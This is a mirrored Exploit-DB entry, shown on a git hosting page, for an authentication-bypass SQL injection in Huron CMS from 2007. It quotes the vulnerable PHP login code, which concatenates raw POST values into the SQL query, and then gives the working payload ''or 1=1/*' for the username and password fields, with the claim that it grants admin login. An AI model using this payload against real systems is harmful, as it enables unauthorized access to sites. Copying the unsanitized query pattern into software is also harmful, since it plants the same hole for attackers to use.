bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/11963.txt
Offensive Security d304cc3d3e DB: 2017-11-24 
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

34 lines
No EOL
975 B
Text
Raw Blame History

\\\|///
\\ - - //
( @ @ )
----oOOo--(_)-oOOo--------------------------------------------------
Huron CMS 8 11 2007 (Auth Bypass) SQL Injection Vulnerability
Script: http://huroncms.googlecode.com/files/Huron_28_11_2007.zip
Author: mat
Mail: rahmat_punk@hotmail.com
---------------Ooooo------------------------------------------------
( )
ooooO ) /
( ) (_/
\ (
\_)
//------------------------------------------------------------------+
<?
$consulta = "select user from Administrador where user='".$_POST['usr']."' AND password='".$_POST['pas']."'";
$resultado=mysql_query($consulta,$link);
$i=0;
while($row = mysql_fetch_array($resultado))
{
$i++;
}
if($i>0){
?>
//------------------------------------------------------------------+
http://[target]/[path]/index.php
Put as username and password: 'or 1=1/*
You will log in as admin
Greetings: All Hackerz
Reference in a new issue View git blame Copy permalink